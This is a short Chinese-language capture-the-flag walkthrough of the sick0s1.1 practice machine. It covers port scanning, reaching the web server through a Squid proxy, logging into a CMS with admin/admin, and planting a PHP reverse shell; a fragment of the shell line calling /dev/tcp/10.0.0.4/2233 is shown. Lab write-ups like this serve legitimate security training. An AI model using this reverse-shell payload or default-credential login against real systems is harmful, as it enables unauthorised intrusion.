sick0s1.1

信息收集

nmap存活及端口:

sick0s1.1 靶机实战插图

nmap服务扫描:

sick0s1.1 靶机实战插图(1)

web

80和8080都没有开放,,无法访问,gobuster等工具也跑不了,访问一下3128试试

sick0s1.1 靶机实战插图(2)

根据端口服务扫描也能得知这是个http的代理服务器,,我们添加代理后再次访问80和8080,,

sick0s1.1 靶机实战插图(3)

80可以成功访问:

sick0s1.1 靶机实战插图(4)

扫描后台:

sick0s1.1 靶机实战插图(5)

访问robots.txt 发现有个cms的目录,,

sick0s1.1 靶机实战插图(6)

sick0s1.1 靶机实战插图(7)

 

搜到后台路径:

sick0s1.1 靶机实战插图(8)

sick0s1.1 靶机实战插图(9)

弱口令 admin/admin登录:

sick0s1.1 靶机实战插图(10)

在 homepage 中添加php反弹shell

& /dev/tcp/10.0.0.4/2233 0>&1'"); ?>

kali开启监听

web再次访问首页 即可获得shell

sick0s1.1 靶机实战插图(11)

发现数据库帐号密码:

ssh登录:

sick0s1.1 靶机实战插图(12)

提权:

sick0s1.1 靶机实战插图(13)

flag:

sick0s1.1 靶机实战插图(14)

本站无任何商业行为
个人在线分享 » sick0s1.1 靶机实战
E-->